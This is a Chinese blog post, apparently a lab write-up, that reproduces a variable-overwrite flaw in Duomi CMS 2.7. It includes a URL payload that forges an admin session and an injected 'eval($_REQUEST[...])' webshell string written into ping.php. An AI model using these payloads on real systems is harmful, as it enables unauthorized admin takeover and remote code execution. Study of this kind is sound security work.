Duomi_2.7 靶场变量覆盖漏洞复现

最新推荐文章于 2024-07-13 18:55:19 发布
最新推荐文章于 2024-07-13 18:55:19 发布
阅读量243 收藏 4
点赞数 5
文章标签: php 安全 系统安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65575962/article/details/138704302
版权

用工具seay审计代码我这里出现变量覆盖中的$$进一步跟进审计找到common.php文件

判断这个第52行foreach语句成功执行的前提条件

对上面28行到第34行代码分析,我们必须要传入一个参数$_k,键名里有cfg_和GLOBALS并且Cookie传参中没有键名就会执行if条件语句我们要不满足以上条件来执行我们的foreach语句只要不进入if分支,就可以通过common.php文件实现任意代码执行回到第54行

继续分析在这里查找_RunMagicQuotes函数定位它在上面

这段代码定义了一个名为 _RunMagicQuotes 的函数,该函数用于处理 PHP 中的 "magic quotes" 功能。Magic quotes 是一个在旧版 PHP 中被弃用的功能,它自动对从客户端接收到的数据进行转义,以防止 SQL 注入等安全问题。

      因此我们需要找到这个项目当中谁用到这个common.php文件全局搜索文件

找到id=8这个文件审计代码

从第42行开始审计,查找第64行keepuser()这个函数定位

审计check.admin.php文件

它使用了会话(session)来存储用户的信息。

我们需要构造的有:

$_SESSION[duomi_admin_id]=userID

$_SESSION[duomi_group_id]=groupid

$_SESSION[duomi_admin_name]=username

以上我们构造userID和username

因此我们可以利用session来伪造管理员登陆后台我们继续查找它满足的条件是什么

      首先必须开启session并且必须引用common.php文件,session在引用common.php文件之前生效才能用自己的session登陆后台继续找符合条件的文件

找到id=11

在这个文件中传入urlsession构造payload

?_SESSION[duomi_admin_id]=1&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=66

登陆后台

shell

找后台功能有没有注入点

发现关键信息,我们输入一些信息查看是否保存到ping.php文件

发现直接写入到文件,我们只需要绕过就可以插入恶意代码

构造

aaa";eval($_REQUEST[111]);"

访问

憨憨448
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
duomi分析工具测试
10-26
"duomi分析工具测试"是一个关于使用特定的分析工具——Duomi进行测试的主题。Duomi工具可能是一款专门针对数据、媒体或系统性能进行分析的应用程序。在这个过程中,"测试"一词表明我们正在评估该工具的功能、性能...
duomi:duimitouzi
06-25
《Duomi: 外汇期权交易平台的JavaScript实详解》 Duomi,又称为"duomitouzi",是一个专门用于外汇期权交易的平台。外汇期权是金融衍生工具的一种,允许投资者在约定的时间内以特定价格买入或卖出某种货币对的权利...
Duomicms_X2.0变量覆盖通杀漏洞
seek_2022的博客
07-13 1675
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
变量覆盖漏洞详解
m0_55854679的博客
03-10 1237
什么是变量覆盖 变量覆盖指的是可以用我们的传参值替换程序原有的变量值,自身危害由代码本身来决定。 如何寻找变量覆盖 经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。 函数解析 传参当做变量,开发起来更加的方便快捷,二次开发会有很大的帮助。 extract()函数 作用: 把数组变成变量。 <?php $a = "1"; $my_array = array("
duomi靶场变量覆盖)获取webshell
qq_61529962的博客
12-18 1163
靶场小练习,理解变量覆盖
DuomiCms X1.0 变量覆盖漏洞
weixin_51681694的博客
04-22 264
上面的代码是对用户的 get,post,cookie传参进行处理,将上述的参数名字都作为变量名字,将参数值都作为变量值。从而导致了可能的变量覆盖漏洞(右侧的函数是对双引号单引号转义处理)漏洞点在 /domiphp/common.php 的 52行代码上。首先插桩查看管理员session。查找一些引用了漏洞文件的页面。尝试自定义session。
duomi:多米互动游戏官网
05-05
【标题】"duomi:多米互动游戏官网"是一个在线游戏平台的官方网站,它采用了代Web开发技术来创建一个互动性强、用户体验良好的游戏站点。这个项目可能是由开发者使用VSCode(Visual Studio Code)这一流行且功能...
DuomiMusic_STN
10-28
很好用的music软件,相信你会喜欢的!
多米音乐 DuoMi
12-31
多米音乐 DuoMi
PHP编程开发工具有哪些?
Pythonit教程网
07-10 995
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 964
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 383
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表,尤其是在处理高并发、大数据量等杂场景时。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 220
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
网关、DHCP协议、ip地址、子网掩码简单介绍
mantouyouyou的博客
07-11 1220
参考文章:https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。
Layer2是什么?为什么需要Layer2?
weixin_37073932的博客
07-13 377
要了解Layer2前,需要先了解下Layer1。一层网络(Layer 1 Network)通常指的是区块链技术中的主链或基础层,它提供了区块链的核心功能和特性。去中心化:一层网络是去中心化的,没有单一的控制中心,由网络中的多个节点共同维护。安全性:一层网络通过加密算法和共识机制(如工作量证明Proof of Work或权益证明Proof of Stake)确保交易的安全性和不可篡改性。共识机制:一层网络使用特定的共识机制来验证交易和创建新区块,这是区块链网络达成一致的方式。智能合约。
[Vulnhub] Simple CuteNews-CMS+Kernel权限提升
最新发布
07-13 92
#CuteNews-CMS #Kernel权限提升
PHP语言教程与实战案例
qq_42072014的博客
07-13 256
PHP是一种广泛使用的开源脚本语言,尤其适用于Web开发并可嵌入HTML中。它的语法吸收了C语言、Java和Perl的特点,易于学习,功能强大。本文将带领你从基础语法入手,通过一系列实用案例,逐步掌握PHP的核心概念和技巧。
ctfshow-web入门-php特性(web89-web95)intval 函数绕过
Welcome To Myon'Blog !
07-12 654
如果第一次匹配成功,再次使用正则表达式匹配 $a 是否等于字符串“php”,但这次只有不区分大小写,是单行模式,不会匹配多行,如果第二次没有匹配成功就会输出 flag。也就是说,如果 num 中不包含数字 "0" 就会终止程序,但是还有一种情况,如果这个 0 出在开头,虽然是找到了有 0 这个字符,但是返回位置为 0 ,if (!== 是相等运算符,在进行比较时,会先将字符串类型转化成相同,再比较,比如比较一个数字和字符串或者比较涉及到数字内容的字符串,字符串会被转换成数值并按照数值来进行比较。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值